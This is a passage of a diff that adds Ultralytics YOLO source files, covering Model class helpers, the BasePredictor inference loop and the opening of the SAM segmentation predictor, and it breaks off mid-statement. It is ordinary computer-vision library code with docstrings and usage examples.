**kwargs, "mode": "train"} # highest priority args on the right + return Tuner(args=args, _callbacks=self.callbacks)(model=self, iterations=iterations) + + def _apply(self, fn) -> "Model": + """ + Applies a function to model tensors that are not parameters or registered buffers. + + This method extends the functionality of the parent class's _apply method by additionally resetting the + predictor and updating the device in the model's overrides. It's typically used for operations like + moving the model to a different device or changing its precision. + + Args: + fn (Callable): A function to be applied to the model's tensors. This is typically a method like + to(), cpu(), cuda(), half(), or float(). + + Returns: + (Model): The model instance with the function applied and updated attributes. + + Raises: + AssertionError: If the model is not a PyTorch model. + + Examples: + >>> model = Model("yolo11n.pt") + >>> model = model._apply(lambda t: t.cuda()) # Move model to GPU + """ + self._check_is_pytorch_model() + self = super()._apply(fn) # noqa + self.predictor = None # reset predictor as device may have changed + self.overrides["device"] = self.device # was str(self.device) i.e. device(type='cuda', index=0) -> 'cuda:0' + return self + + @property + def names(self) -> Dict[int, str]: + """ + Retrieves the class names associated with the loaded model. + + This property returns the class names if they are defined in the model. It checks the class names for validity + using the 'check_class_names' function from the ultralytics.nn.autobackend module. If the predictor is not + initialized, it sets it up before retrieving the names. + + Returns: + (Dict[int, str]): A dict of class names associated with the model. + + Raises: + AttributeError: If the model or predictor does not have a 'names' attribute. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> print(model.names) + {0: 'person', 1: 'bicycle', 2: 'car', ...} + """ + from ultralytics.nn.autobackend import check_class_names + + if hasattr(self.model, "names"): + return check_class_names(self.model.names) + if not self.predictor: # export formats will not have predictor defined until predict() is called + self.predictor = self._smart_load("predictor")(overrides=self.overrides, _callbacks=self.callbacks) + self.predictor.setup_model(model=self.model, verbose=False) + return self.predictor.model.names + + @property + def device(self) -> torch.device: + """ + Retrieves the device on which the model's parameters are allocated. + + This property determines the device (CPU or GPU) where the model's parameters are currently stored. It is + applicable only to models that are instances of nn.Module. + + Returns: + (torch.device): The device (CPU/GPU) of the model. + + Raises: + AttributeError: If the model is not a PyTorch nn.Module instance. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> print(model.device) + device(type='cuda', index=0) # if CUDA is available + >>> model = model.to("cpu") + >>> print(model.device) + device(type='cpu') + """ + return next(self.model.parameters()).device if isinstance(self.model, nn.Module) else None + + @property + def transforms(self): + """ + Retrieves the transformations applied to the input data of the loaded model. + + This property returns the transformations if they are defined in the model. The transforms + typically include preprocessing steps like resizing, normalization, and data augmentation + that are applied to input data before it is fed into the model. + + Returns: + (object | None): The transform object of the model if available, otherwise None. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> transforms = model.transforms + >>> if transforms: + ... print(f"Model transforms: {transforms}") + ... else: + ... print("No transforms defined for this model.") + """ + return self.model.transforms if hasattr(self.model, "transforms") else None + + def add_callback(self, event: str, func) -> None: + """ + Adds a callback function for a specified event. + + This method allows registering custom callback functions that are triggered on specific events during + model operations such as training or inference. Callbacks provide a way to extend and customize the + behavior of the model at various stages of its lifecycle. + + Args: + event (str): The name of the event to attach the callback to. Must be a valid event name recognized + by the Ultralytics framework. + func (Callable): The callback function to be registered. This function will be called when the + specified event occurs. + + Raises: + ValueError: If the event name is not recognized or is invalid. + + Examples: + >>> def on_train_start(trainer): + ... print("Training is starting!") + >>> model = YOLO("yolo11n.pt") + >>> model.add_callback("on_train_start", on_train_start) + >>> model.train(data="coco8.yaml", epochs=1) + """ + self.callbacks[event].append(func) + + def clear_callback(self, event: str) -> None: + """ + Clears all callback functions registered for a specified event. + + This method removes all custom and default callback functions associated with the given event. + It resets the callback list for the specified event to an empty list, effectively removing all + registered callbacks for that event. + + Args: + event (str): The name of the event for which to clear the callbacks. This should be a valid event name + recognized by the Ultralytics callback system. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> model.add_callback("on_train_start", lambda: print("Training started")) + >>> model.clear_callback("on_train_start") + >>> # All callbacks for 'on_train_start' are now removed + + Notes: + - This method affects both custom callbacks added by the user and default callbacks + provided by the Ultralytics framework. + - After calling this method, no callbacks will be executed for the specified event + until new ones are added. + - Use with caution as it removes all callbacks, including essential ones that might + be required for proper functioning of certain operations. + """ + self.callbacks[event] = [] + + def reset_callbacks(self) -> None: + """ + Resets all callbacks to their default functions. + + This method reinstates the default callback functions for all events, removing any custom callbacks that were + previously added. It iterates through all default callback events and replaces the current callbacks with the + default ones. + + The default callbacks are defined in the 'callbacks.default_callbacks' dictionary, which contains predefined + functions for various events in the model's lifecycle, such as on_train_start, on_epoch_end, etc. + + This method is useful when you want to revert to the original set of callbacks after making custom + modifications, ensuring consistent behavior across different runs or experiments. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> model.add_callback("on_train_start", custom_function) + >>> model.reset_callbacks() + # All callbacks are now reset to their default functions + """ + for event in callbacks.default_callbacks.keys(): + self.callbacks[event] = [callbacks.default_callbacks[event][0]] + + @staticmethod + def _reset_ckpt_args(args: dict) -> dict: + """ + Resets specific arguments when loading a PyTorch model checkpoint. + + This static method filters the input arguments dictionary to retain only a specific set of keys that are + considered important for model loading. It's used to ensure that only relevant arguments are preserved + when loading a model from a checkpoint, discarding any unnecessary or potentially conflicting settings. + + Args: + args (dict): A dictionary containing various model arguments and settings. + + Returns: + (dict): A new dictionary containing only the specified include keys from the input arguments. + + Examples: + >>> original_args = {"imgsz": 640, "data": "coco.yaml", "task": "detect", "batch": 16, "epochs": 100} + >>> reset_args = Model._reset_ckpt_args(original_args) + >>> print(reset_args) + {'imgsz': 640, 'data': 'coco.yaml', 'task': 'detect'} + """ + include = {"imgsz", "data", "task", "single_cls"} # only remember these arguments when loading a PyTorch model + return {k: v for k, v in args.items() if k in include} + + # def __getattr__(self, attr): + # """Raises error if object has no requested attribute.""" + # name = self.__class__.__name__ + # raise AttributeError(f"'{name}' object has no attribute '{attr}'. See valid attributes below.\n{self.__doc__}") + + def _smart_load(self, key: str): + """ + Loads the appropriate module based on the model task. + + This method dynamically selects and returns the correct module (model, trainer, validator, or predictor) + based on the current task of the model and the provided key. It uses the task_map attribute to determine + the correct module to load. + + Args: + key (str): The type of module to load. Must be one of 'model', 'trainer', 'validator', or 'predictor'. + + Returns: + (object): The loaded module corresponding to the specified key and current task. + + Raises: + NotImplementedError: If the specified key is not supported for the current task. + + Examples: + >>> model = Model(task="detect") + >>> predictor = model._smart_load("predictor") + >>> trainer = model._smart_load("trainer") + + Notes: + - This method is typically used internally by other methods of the Model class. + - The task_map attribute should be properly initialized with the correct mappings for each task. + """ + try: + return self.task_map[self.task][key] + except Exception as e: + name = self.__class__.__name__ + mode = inspect.stack()[1][3] # get the function name. + raise NotImplementedError( + emojis(f"WARNING ⚠️ '{name}' model does not support '{mode}' mode for '{self.task}' task yet.") + ) from e + + @property + def task_map(self) -> dict: + """ + Provides a mapping from model tasks to corresponding classes for different modes. + + This property method returns a dictionary that maps each supported task (e.g., detect, segment, classify) + to a nested dictionary. The nested dictionary contains mappings for different operational modes + (model, trainer, validator, predictor) to their respective class implementations. + + The mapping allows for dynamic loading of appropriate classes based on the model's task and the + desired operational mode. This facilitates a flexible and extensible architecture for handling + various tasks and modes within the Ultralytics framework. + + Returns: + (Dict[str, Dict[str, Any]]): A dictionary where keys are task names (str) and values are + nested dictionaries. Each nested dictionary has keys 'model', 'trainer', 'validator', and + 'predictor', mapping to their respective class implementations. + + Examples: + >>> model = Model() + >>> task_map = model.task_map + >>> detect_class_map = task_map["detect"] + >>> segment_class_map = task_map["segment"] + + Note: + The actual implementation of this method may vary depending on the specific tasks and + classes supported by the Ultralytics framework. The docstring provides a general + description of the expected behavior and structure. + """ + raise NotImplementedError("Please provide task map for your model!") + + def eval(self): + """ + Sets the model to evaluation mode. + + This method changes the model's mode to evaluation, which affects layers like dropout and batch normalization + that behave differently during training and evaluation. + + Returns: + (Model): The model instance with evaluation mode set. + + Examples: + >> model = YOLO("yolo11n.pt") + >> model.eval() + """ + self.model.eval() + return self + + def __getattr__(self, name): + """ + Enables accessing model attributes directly through the Model class. + + This method provides a way to access attributes of the underlying model directly through the Model class + instance. It first checks if the requested attribute is 'model', in which case it returns the model from + the module dictionary. Otherwise, it delegates the attribute lookup to the underlying model. + + Args: + name (str): The name of the attribute to retrieve. + + Returns: + (Any): The requested attribute value. + + Raises: + AttributeError: If the requested attribute does not exist in the model. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> print(model.stride) + >>> print(model.task) + """ + if name == "model": + return self._modules["model"] + return getattr(self.model, name) diff --git a/2024.ultralytics/v8.3.41/engine/predictor.py b/2024.ultralytics/v8.3.41/engine/predictor.py new file mode 100644 index 0000000..c28e189 --- /dev/null +++ b/2024.ultralytics/v8.3.41/engine/predictor.py @@ -0,0 +1,408 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license +""" +Run prediction on images, videos, directories, globs, YouTube, webcam, streams, etc. + +Usage - sources: + $ yolo mode=predict model=yolov8n.pt source=0 # webcam + img.jpg # image + vid.mp4 # video + screen # screenshot + path/ # directory + list.txt # list of images + list.streams # list of streams + 'path/*.jpg' # glob + 'https://youtu.be/LNwODJXcvt4' # YouTube + 'rtsp://example.com/media.mp4' # RTSP, RTMP, HTTP, TCP stream + +Usage - formats: + $ yolo mode=predict model=yolov8n.pt # PyTorch + yolov8n.torchscript # TorchScript + yolov8n.onnx # ONNX Runtime or OpenCV DNN with dnn=True + yolov8n_openvino_model # OpenVINO + yolov8n.engine # TensorRT + yolov8n.mlpackage # CoreML (macOS-only) + yolov8n_saved_model # TensorFlow SavedModel + yolov8n.pb # TensorFlow GraphDef + yolov8n.tflite # TensorFlow Lite + yolov8n_edgetpu.tflite # TensorFlow Edge TPU + yolov8n_paddle_model # PaddlePaddle + yolov8n.mnn # MNN + yolov8n_ncnn_model # NCNN +""" + +import platform +import re +import threading +from pathlib import Path + +import cv2 +import numpy as np +import torch + +from ultralytics.cfg import get_cfg, get_save_dir +from ultralytics.data import load_inference_source +from ultralytics.data.augment import LetterBox, classify_transforms +from ultralytics.nn.autobackend import AutoBackend +from ultralytics.utils import DEFAULT_CFG, LOGGER, MACOS, WINDOWS, callbacks, colorstr, ops +from ultralytics.utils.checks import check_imgsz, check_imshow +from ultralytics.utils.files import increment_path +from ultralytics.utils.torch_utils import select_device, smart_inference_mode + +STREAM_WARNING = """ +WARNING ⚠️ inference results will accumulate in RAM unless `stream=True` is passed, causing potential out-of-memory +errors for large sources or long-running streams and videos. See https://docs.ultralytics.com/modes/predict/ for help. + +Example: + results = model(source=..., stream=True) # generator of Results objects + for r in results: + boxes = r.boxes # Boxes object for bbox outputs + masks = r.masks # Masks object for segment masks outputs + probs = r.probs # Class probabilities for classification outputs +""" + + +class BasePredictor: + """ + BasePredictor. + + A base class for creating predictors. + + Attributes: + args (SimpleNamespace): Configuration for the predictor. + save_dir (Path): Directory to save results. + done_warmup (bool): Whether the predictor has finished setup. + model (nn.Module): Model used for prediction. + data (dict): Data configuration. + device (torch.device): Device used for prediction. + dataset (Dataset): Dataset used for prediction. + vid_writer (dict): Dictionary of {save_path: video_writer, ...} writer for saving video output. + """ + + def __init__(self, cfg=DEFAULT_CFG, overrides=None, _callbacks=None): + """ + Initializes the BasePredictor class. + + Args: + cfg (str, optional): Path to a configuration file. Defaults to DEFAULT_CFG. + overrides (dict, optional): Configuration overrides. Defaults to None. + """ + self.args = get_cfg(cfg, overrides) + self.save_dir = get_save_dir(self.args) + if self.args.conf is None: + self.args.conf = 0.25 # default conf=0.25 + self.done_warmup = False + if self.args.show: + self.args.show = check_imshow(warn=True) + + # Usable if setup is done + self.model = None + self.data = self.args.data # data_dict + self.imgsz = None + self.device = None + self.dataset = None + self.vid_writer = {} # dict of {save_path: video_writer, ...} + self.plotted_img = None + self.source_type = None + self.seen = 0 + self.windows = [] + self.batch = None + self.results = None + self.transforms = None + self.callbacks = _callbacks or callbacks.get_default_callbacks() + self.txt_path = None + self._lock = threading.Lock() # for automatic thread-safe inference + callbacks.add_integration_callbacks(self) + + def preprocess(self, im): + """ + Prepares input image before inference. + + Args: + im (torch.Tensor | List(np.ndarray)): BCHW for tensor, [(HWC) x B] for list. + """ + not_tensor = not isinstance(im, torch.Tensor) + if not_tensor: + im = np.stack(self.pre_transform(im)) + im = im[..., ::-1].transpose((0, 3, 1, 2)) # BGR to RGB, BHWC to BCHW, (n, 3, h, w) + im = np.ascontiguousarray(im) # contiguous + im = torch.from_numpy(im) + + im = im.to(self.device) + im = im.half() if self.model.fp16 else im.float() # uint8 to fp16/32 + if not_tensor: + im /= 255 # 0 - 255 to 0.0 - 1.0 + return im + + def inference(self, im, *args, **kwargs): + """Runs inference on a given image using the specified model and arguments.""" + visualize = ( + increment_path(self.save_dir / Path(self.batch[0][0]).stem, mkdir=True) + if self.args.visualize and (not self.source_type.tensor) + else False + ) + return self.model(im, augment=self.args.augment, visualize=visualize, embed=self.args.embed, *args, **kwargs) + + def pre_transform(self, im): + """ + Pre-transform input image before inference. + + Args: + im (List(np.ndarray)): (N, 3, h, w) for tensor, [(h, w, 3) x N] for list. + + Returns: + (list): A list of transformed images. + """ + same_shapes = len({x.shape for x in im}) == 1 + letterbox = LetterBox( + self.imgsz, + auto=same_shapes and (self.model.pt or getattr(self.model, "dynamic", False)), + stride=self.model.stride, + ) + return [letterbox(image=x) for x in im] + + def postprocess(self, preds, img, orig_imgs): + """Post-processes predictions for an image and returns them.""" + return preds + + def __call__(self, source=None, model=None, stream=False, *args, **kwargs): + """Performs inference on an image or stream.""" + self.stream = stream + if stream: + return self.stream_inference(source, model, *args, **kwargs) + else: + return list(self.stream_inference(source, model, *args, **kwargs)) # merge list of Result into one + + def predict_cli(self, source=None, model=None): + """ + Method used for Command Line Interface (CLI) prediction. + + This function is designed to run predictions using the CLI. It sets up the source and model, then processes + the inputs in a streaming manner. This method ensures that no outputs accumulate in memory by consuming the + generator without storing results. + + Note: + Do not modify this function or remove the generator. The generator ensures that no outputs are + accumulated in memory, which is critical for preventing memory issues during long-running predictions. + """ + gen = self.stream_inference(source, model) + for _ in gen: # sourcery skip: remove-empty-nested-block, noqa + pass + + def setup_source(self, source): + """Sets up source and inference mode.""" + self.imgsz = check_imgsz(self.args.imgsz, stride=self.model.stride, min_dim=2) # check image size + self.transforms = ( + getattr( + self.model.model, + "transforms", + classify_transforms(self.imgsz[0], crop_fraction=self.args.crop_fraction), + ) + if self.args.task == "classify" + else None + ) + self.dataset = load_inference_source( + source=source, + batch=self.args.batch, + vid_stride=self.args.vid_stride, + buffer=self.args.stream_buffer, + ) + self.source_type = self.dataset.source_type + if not getattr(self, "stream", True) and ( + self.source_type.stream + or self.source_type.screenshot + or len(self.dataset) > 1000 # many images + or any(getattr(self.dataset, "video_flag", [False])) + ): # videos + LOGGER.warning(STREAM_WARNING) + self.vid_writer = {} + + @smart_inference_mode() + def stream_inference(self, source=None, model=None, *args, **kwargs): + """Streams real-time inference on camera feed and saves results to file.""" + if self.args.verbose: + LOGGER.info("") + + # Setup model + if not self.model: + self.setup_model(model) + + with self._lock: # for thread-safe inference + # Setup source every time predict is called + self.setup_source(source if source is not None else self.args.source) + + # Check if save_dir/ label file exists + if self.args.save or self.args.save_txt: + (self.save_dir / "labels" if self.args.save_txt else self.save_dir).mkdir(parents=True, exist_ok=True) + + # Warmup model + if not self.done_warmup: + self.model.warmup(imgsz=(1 if self.model.pt or self.model.triton else self.dataset.bs, 3, *self.imgsz)) + self.done_warmup = True + + self.seen, self.windows, self.batch = 0, [], None + profilers = ( + ops.Profile(device=self.device), + ops.Profile(device=self.device), + ops.Profile(device=self.device), + ) + self.run_callbacks("on_predict_start") + for self.batch in self.dataset: + self.run_callbacks("on_predict_batch_start") + paths, im0s, s = self.batch + + # Preprocess + with profilers[0]: + im = self.preprocess(im0s) + + # Inference + with profilers[1]: + preds = self.inference(im, *args, **kwargs) + if self.args.embed: + yield from [preds] if isinstance(preds, torch.Tensor) else preds # yield embedding tensors + continue + + # Postprocess + with profilers[2]: + self.results = self.postprocess(preds, im, im0s) + self.run_callbacks("on_predict_postprocess_end") + + # Visualize, save, write results + n = len(im0s) + for i in range(n): + self.seen += 1 + self.results[i].speed = { + "preprocess": profilers[0].dt * 1e3 / n, + "inference": profilers[1].dt * 1e3 / n, + "postprocess": profilers[2].dt * 1e3 / n, + } + if self.args.verbose or self.args.save or self.args.save_txt or self.args.show: + s[i] += self.write_results(i, Path(paths[i]), im, s) + + # Print batch results + if self.args.verbose: + LOGGER.info("\n".join(s)) + + self.run_callbacks("on_predict_batch_end") + yield from self.results + + # Release assets + for v in self.vid_writer.values(): + if isinstance(v, cv2.VideoWriter): + v.release() + + # Print final results + if self.args.verbose and self.seen: + t = tuple(x.t / self.seen * 1e3 for x in profilers) # speeds per image + LOGGER.info( + f"Speed: %.1fms preprocess, %.1fms inference, %.1fms postprocess per image at shape " + f"{(min(self.args.batch, self.seen), 3, *im.shape[2:])}" % t + ) + if self.args.save or self.args.save_txt or self.args.save_crop: + nl = len(list(self.save_dir.glob("labels/*.txt"))) # number of labels + s = f"\n{nl} label{'s' * (nl > 1)} saved to {self.save_dir / 'labels'}" if self.args.save_txt else "" + LOGGER.info(f"Results saved to {colorstr('bold', self.save_dir)}{s}") + self.run_callbacks("on_predict_end") + + def setup_model(self, model, verbose=True): + """Initialize YOLO model with given parameters and set it to evaluation mode.""" + self.model = AutoBackend( + weights=model or self.args.model, + device=select_device(self.args.device, verbose=verbose), + dnn=self.args.dnn, + data=self.args.data, + fp16=self.args.half, + batch=self.args.batch, + fuse=True, + verbose=verbose, + ) + + self.device = self.model.device # update device + self.args.half = self.model.fp16 # update half + self.model.eval() + + def write_results(self, i, p, im, s): + """Write inference results to a file or directory.""" + string = "" # print string + if len(im.shape) == 3: + im = im[None] # expand for batch dim + if self.source_type.stream or self.source_type.from_img or self.source_type.tensor: # batch_size >= 1 + string += f"{i}: " + frame = self.dataset.count + else: + match = re.search(r"frame (\d+)/", s[i]) + frame = int(match[1]) if match else None # 0 if frame undetermined + + self.txt_path = self.save_dir / "labels" / (p.stem + ("" if self.dataset.mode == "image" else f"_{frame}")) + string += "{:g}x{:g} ".format(*im.shape[2:]) + result = self.results[i] + result.save_dir = self.save_dir.__str__() # used in other locations + string += f"{result.verbose()}{result.speed['inference']:.1f}ms" + + # Add predictions to image + if self.args.save or self.args.show: + self.plotted_img = result.plot( + line_width=self.args.line_width, + boxes=self.args.show_boxes, + conf=self.args.show_conf, + labels=self.args.show_labels, + im_gpu=None if self.args.retina_masks else im[i], + ) + + # Save results + if self.args.save_txt: + result.save_txt(f"{self.txt_path}.txt", save_conf=self.args.save_conf) + if self.args.save_crop: + result.save_crop(save_dir=self.save_dir / "crops", file_name=self.txt_path.stem) + if self.args.show: + self.show(str(p)) + if self.args.save: + self.save_predicted_images(str(self.save_dir / p.name), frame) + + return string + + def save_predicted_images(self, save_path="", frame=0): + """Save video predictions as mp4 at specified path.""" + im = self.plotted_img + + # Save videos and streams + if self.dataset.mode in {"stream", "video"}: + fps = self.dataset.fps if self.dataset.mode == "video" else 30 + frames_path = f'{save_path.split(".", 1)[0]}_frames/' + if save_path not in self.vid_writer: # new video + if self.args.save_frames: + Path(frames_path).mkdir(parents=True, exist_ok=True) + suffix, fourcc = (".mp4", "avc1") if MACOS else (".avi", "WMV2") if WINDOWS else (".avi", "MJPG") + self.vid_writer[save_path] = cv2.VideoWriter( + filename=str(Path(save_path).with_suffix(suffix)), + fourcc=cv2.VideoWriter_fourcc(*fourcc), + fps=fps, # integer required, floats produce error in MP4 codec + frameSize=(im.shape[1], im.shape[0]), # (width, height) + ) + + # Save video + self.vid_writer[save_path].write(im) + if self.args.save_frames: + cv2.imwrite(f"{frames_path}{frame}.jpg", im) + + # Save images + else: + cv2.imwrite(str(Path(save_path).with_suffix(".jpg")), im) # save to JPG for best support + + def show(self, p=""): + """Display an image in a window using the OpenCV imshow function.""" + im = self.plotted_img + if platform.system() == "Linux" and p not in self.windows: + self.windows.append(p) + cv2.namedWindow(p, cv2.WINDOW_NORMAL | cv2.WINDOW_KEEPRATIO) # allow window resize (Linux) + cv2.resizeWindow(p, im.shape[1], im.shape[0]) # (width, height) + cv2.imshow(p, im) + cv2.waitKey(300 if self.dataset.mode == "image" else 1) # 1 millisecond + + def run_callbacks(self, event: str): + """Runs all registered callbacks for a specific event.""" + for callback in self.callbacks.get(event, []): + callback(self) + + def add_callback(self, event: str, func): + """Add callback.""" + self.callbacks[event].append(func) diff --git a/2024.ultralytics/v8.3.41/models/sam/predict.py b/2024.ultralytics/v8.3.41/models/sam/predict.py new file mode 100644 index 0000000..540d100 --- /dev/null +++ b/2024.ultralytics/v8.3.41/models/sam/predict.py @@ -0,0 +1,1606 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license +""" +Generate predictions using the Segment Anything Model (SAM). + +SAM is an advanced image segmentation model offering features like promptable segmentation and zero-shot performance. +This module contains the implementation of the prediction logic and auxiliary utilities required to perform segmentation +using SAM. It forms an integral part of the Ultralytics framework and is designed for high-performance, real-time image +segmentation tasks. +""" + +from collections import OrderedDict + +import numpy as np +import torch +import torch.nn.functional as F + +from ultralytics.data.augment import LetterBox +from ultralytics.engine.predictor import BasePredictor +from ultralytics.engine.results import Results +from ultralytics.utils import DEFAULT_CFG, ops +from ultralytics.utils.torch_utils import select_device, smart_inference_mode + +from .amg import ( + batch_iterator, + batched_mask_to_box, + build_all_layer_point_grids, + calculate_stability_score, + generate_crop_boxes, + is_box_near_crop_edge, + remove_small_regions, + uncrop_boxes_xyxy, + uncrop_masks, +) +from .build import build_sam + + +class Predictor(BasePredictor): + """ + Predictor class for SAM, enabling real-time image segmentation with promptable capabilities. + + This class extends BasePredictor and implements the Segment Anything Model (SAM) for advanced image + segmentation tasks. It supports various input prompts like points, bounding boxes, and masks for + fine-grained control over segmentation results. + + Attributes: + args (SimpleNamespace): Configuration arguments for the predictor. + model (torch.nn.Module): The loaded SAM model. + device (torch.device): The device (CPU or GPU) on which the model is loaded. + im (torch.Tensor): The preprocessed input image. + features (torch.Tensor): Extracted image features. + prompts (Dict): Dictionary to store various types of prompts (e.g., bboxes, points, masks). + segment_all (bool): Flag to indicate if full image segmentation should be performed. + mean (torch.Tensor): Mean values for image normalization. + std (torch.Tensor): Standard deviation values for image normalization. + + Methods: + preprocess: Prepares input images for model inference. + pre_transform: Performs initial transformations on the input image. + inference: Performs segmentation inference based on input prompts. + prompt_inference: Internal function for prompt-based segmentation inference. + generate: Generates segmentation masks for an entire image. + setup_model: Initializes the SAM model for inference. + get_model: Builds and returns a SAM model. + postprocess: Post-processes model outputs to generate final results. + setup_source: Sets up the data source for inference. + set_image: Sets and preprocesses a single image for inference. + get_im_features: Extracts image features using the SAM image encoder. + set_prompts: Sets prompts for subsequent inference. + reset_image: Resets the current image and its features. + remove_small_regions: Removes small disconnected regions and holes from masks. + + Examples: + >>> predictor = Predictor() + >>> predictor.setup_model(model_path="sam_model.pt") + >>> predictor.set_image("image.jpg") + >>> masks, scores, boxes = predictor.generate() + >>> results = predictor.postprocess((masks, scores, boxes), im, orig_img) + """ + + def __init__(self, cfg=DEFAULT_CFG, overrides=None, _callbacks=None): + """ + Initialize the Predictor with configuration, overrides, and callbacks. + + Sets up the Predictor object for SAM (Segment Anything Model) and applies any configuration overrides or + callbacks provided. Initializes task-specific settings for SAM, such as retina_masks being set to True + for optimal results. + + Args: + cfg (Dict): Configuration dictionary containing default settings. + overrides (Dict | None): Dictionary of values to override default configuration. + _callbacks (Dict | None): Dictionary of callback functions to customize behavior. + + Examples: + >>> predictor = Predictor(cfg=DEFAULT_CFG) + >>> predictor = Predictor(overrides={"imgsz": 640}) + >>> predictor = Predictor(_callbacks={"on_predict_start": custom_callback}) + """ + if overrides is None: + overrides = {} + overrides.update(dict(task="segment", mode="predict", batch=1)) + super().__init__(cfg, overrides, _callbacks) + self.args.retina_masks = True + self.im = None + self.features = None + self.prompts = {} + self.segment_all = False + + def preprocess(self, im): + """ + Preprocess the input image for model inference. + + This method prepares the input image by applying transformations and normalization. It supports both + torch.Tensor and list of np.ndarray as input formats. + + Args: + im (torch.Tensor | List[np.ndarray]): Input image(s) in BCHW tensor format or list of HWC numpy arrays. + + Returns: + im (torch.Tensor): The preprocessed image tensor, normalized and converted to the appropriate dtype. + + Examples: + >>> predictor = Predictor() + >>> image = torch.rand(1, 3, 640, 640) + >>> preprocessed_image = predictor.preprocess(image) + """ + if self.im is not None: + return self.im + not_tensor = not isinstance(im, torch.Tensor) + if not_tensor: + im = np.stack(self.pre_transform(im)) + im = im[..., ::-1].transpose((0, 3, 1, 2)) + im = np.ascontiguousarray(im) + im = torch.from_numpy(im) + + im = im.to(self.device) + im = im.half() if self.model.fp16 else im.float() + if not_tensor: + im = (im - self.mean) / self.std + return im + + def pre_transform(self, im): + """ + Perform initial transformations on the input image for preprocessing. + + This method applies transformations such as resizing to prepare the image for further preprocessing. + Currently, batched inference is not supported; hence the list length should be 1. + + Args: + im (List[np.ndarray]): List containing a single image in HWC numpy array format. + + Returns: + (List[np.ndarray]): List containing the transformed image. + + Raises: + AssertionError: If the input list contains more than one image. + + Examples: + >>> predictor = Predictor() + >>> image = np.random.rand(480, 640, 3) # Single HWC image + >>> transformed = predictor.pre_transform([image]) + >>> print(len(transformed)) + 1 + """ + assert len(im) == 1, "SAM model does not currently support batched inference" + letterbox = LetterBox(self.args.imgsz, auto=False, center=False) + return [letterbox(image=x) for x in im] + + def inference(self, im, bboxes=None, points=None, labels=None, masks=None, multimask_output=False, *args, **kwargs): + """ + Perform image segmentation inference based on the given input cues, using the currently loaded image. + + This method leverages SAM's (Segment Anything Model) architecture consisting of image encoder, prompt + encoder, and mask decoder for real-time and promptable segmentation tasks. + + Args: + im (torch.Tensor): The preprocessed input image in tensor format, with shape (N, C, H, W). + bboxes (np.ndarray | List | None): Bounding boxes with shape (N, 4), in XYXY format. + points (np.ndarray | List | None): Points indicating object locations with shape (N, 2), in pixels. + labels (np.ndarray | List | None): Labels for point prompts, shape (N,). 1 = foreground, 0 = background. + masks (np.ndarray | None): Low-resolution masks from previous predictions, shape (N, H, W). For SAM H=W=256. + multimask_output (bool): Flag to return multiple masks. Helpful for ambiguous prompts. + *args (Any): Additional positional arguments. + **kwargs (Any): Additional keyword arguments. + + Returns: + (np.ndarray): The output masks in shape (C, H, W), where C is the number of generated masks. + (np.ndarray): An array of length C containing quality scores predicted by the model for each mask. + (np.ndarray): Low-resolution logits of shape (C, H, W) for subsequent inference, where H=W=256. + + Examples: + >>> predictor = Predictor() + >>> predictor.setup_model(model_path="sam_model.pt") + >>> predictor.set_image("image.jpg") + >>> masks, scores, logits = predictor.inference(im, bboxes=[[0, 0, 100, 100]]) + """ + # Override prompts if any stored in self.prompts + bboxes = self.prompts.pop("bboxes", bboxes) + points = self.prompts.pop("points", points) + masks = self.prompts.pop("masks", masks) + labels = self.prompts.pop("labels", labels) + + if all(i is None for i in [bboxes, points, masks]): + return self.generate(im, *args, **kwargs) + + return self.prompt_inference(im, bboxes, points, labels, masks, multimask_output) + + def prompt_inference(self, im, bboxes=None, points=None, labels=None, masks=None, multimask_output=False): + """ + Performs image segmentation inference based on input cues using SAM's specialized architecture. + + This internal function leverages the Segment Anything Model (SAM) for prompt-based, real-time segmentation. + It processes various input prompts such as bounding boxes, points, and masks to generate segmentation masks. + + Args: + im (torch.Tensor): Preprocessed input image tensor with shape (N, C, H, W). + bboxes (np.ndarray | List | None): Bounding boxes in XYXY format with shape (N, 4). + points (np.ndarray | List | None): Points indicating object locations with shape (N, 2) or (N, num_points, 2), in pixels. + labels (np.ndarray | List | None): Point prompt labels with shape (N,) or (N, num_points). 1 for foreground, 0 for background. + masks (np.ndarray | None): Low-res masks from previous predictions with shape (N, H, W). For SAM, H=W=256. + multimask_output (bool): Flag to return multiple masks for ambiguous prompts. + + Raises: + AssertionError: If the number of points don't match the number of labels, in case labels were passed. + + Returns: + (np.ndarray): Output masks with shape (C, H, W), where C is the number of generated masks. + (np.ndarray): Quality scores predicted by the model for each mask, with length C. + + Examples: + >>> predictor = Predictor() + >>> im = torch.rand(1, 3, 1024, 1024) + >>> bboxes = [[100, 100, 200, 200]] + >>> masks, scores, logits = predictor.prompt_inference(im, bboxes=bboxes) + """ + features = self.get_im_features(im) if self.features is None else self.features + + bboxes, points, labels, masks = self._prepare_prompts(im.shape[2:], bboxes, points, labels, masks) + points = (points, labels) if points is not None else None + # Embed prompts + sparse_embeddings, dense_embeddings = self.model.prompt_encoder(points=points, boxes=bboxes, masks=masks) + + # Predict masks + pred_masks, pred_scores = self.model.mask_decoder( + image_embeddings=features, + image_pe=self.model.prompt_encoder.get_dense_pe(), + sparse_prompt_embeddings=sparse_embeddings, + dense_prompt_embeddings=dense_embeddings, + multimask_output=multimask_output, + ) + + # (N, d, H, W) --> (N*d, H, W), (N, d) --> (N*d, ) + # `d` could be 1 or 3 depends on `multimask_output`. + return pred_masks.flatten(0, 1), pred_scores.flatten(0, 1) + + def _prepare_prompts(self, dst_shape, bboxes=None, points=None, labels=None, masks=None): + """ + Prepares and transforms the input prompts for processing based on the destination shape. + + Args: + dst_shape (tuple): The target shape (height, width) for the prompts. + bboxes (np.ndarray | List | None): Bounding boxes in XYXY format with shape (N, 4). + points (np.ndarray | List | None): Points indicating object locations with shape (N, 2) or (N, num_points, 2), in pixels. + labels (np.ndarray | List | None): Point prompt labels with shape (N,) or (N, num_points). 1 for foreground, 0 for background. + masks (List | np.ndarray, Optional): Masks for the objects, where each mask is a 2D array. + + Raises: + AssertionError: If the number of points don't match the number of labels, in case labels were passed. + + Returns: + (tuple): A tuple containing transformed bounding boxes, points, labels, and masks. + """ + src_shape = self.batch[1][0].shape[:2] + r = 1.0 if self.segment_all else min(dst_shape[0] / src_shape[0], dst_shape[1] / src_shape[1]) + # Transform input prompts + if points is not 